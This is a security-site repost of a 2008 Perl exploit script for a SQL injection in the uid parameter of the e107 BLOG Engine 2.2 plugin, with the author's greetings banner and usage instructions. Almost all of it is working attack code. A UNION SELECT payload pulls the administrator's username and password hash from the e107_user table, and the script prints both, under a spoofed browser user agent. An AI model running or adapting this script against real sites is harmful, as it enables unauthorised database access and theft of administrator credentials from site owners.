首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit
来源:www.virangar.net 作者:virangar 发布时间:2008-09-02  
#!/usr/bin/perl
##############################################################
# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit        #
#               ..::virangar security team::..               #
#                    www.virangar.net                        #
#         C0d3d BY:virangar security team ( hadihadi  )      #
#special tnx to:                                             #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra              #
#& all virangar members & all hackerz                        #
# my lovely friends hadi_aryaie2004 & arash(imm02tal)        #
#             ..:::Young Iranina Hackerz::..                 #
##############################################################


use HTTP::Request;
use LWP::UserAgent;

if (@ARGV != 1){
header();
}
$site = $ARGV[0];

$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_
id=1/*";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;

if ($res =~ /<user>(.*?)<user>/){
        print "\n[+] Admin User : $1";}
if ($res =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "\n[+]Done\n";}

sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit             #
#                      www.virangar.net                           #
#   Useage: perl $0 Host                                          #
#                                                                 #
#   Host: full patch to macgurublog.php (dont forget http://)     #
#                                                                 #
#  Example:                                                       #
# perl $0 http://site/macgurublog_menu/macgurublog.php            #
#                                                                 #
###################################################################
};
}
#virangar.net[2008-05-22]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VMware COM API ActiveX Remote
·Google Chrome Browser 0.2.149.
·WeBid 0.5.4 (fckeditor) Remote
·Moodle <= 1.8.4 Remote Code Ex
·MicroTik RouterOS <= 3.13 SNMP
·CitectSCADA ODBC Server Remote
·Sun Solaris 8/9/10 and OpenSol
·Numark Cue 5.0 rev 2 Local .M3
·Postfix <= 2.6-20080814 (symli
·Flock Social Web Browser 1.2.5
·Friendly Technologies Read/Wri
·Simple Machines Forum <= 1.1.5
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved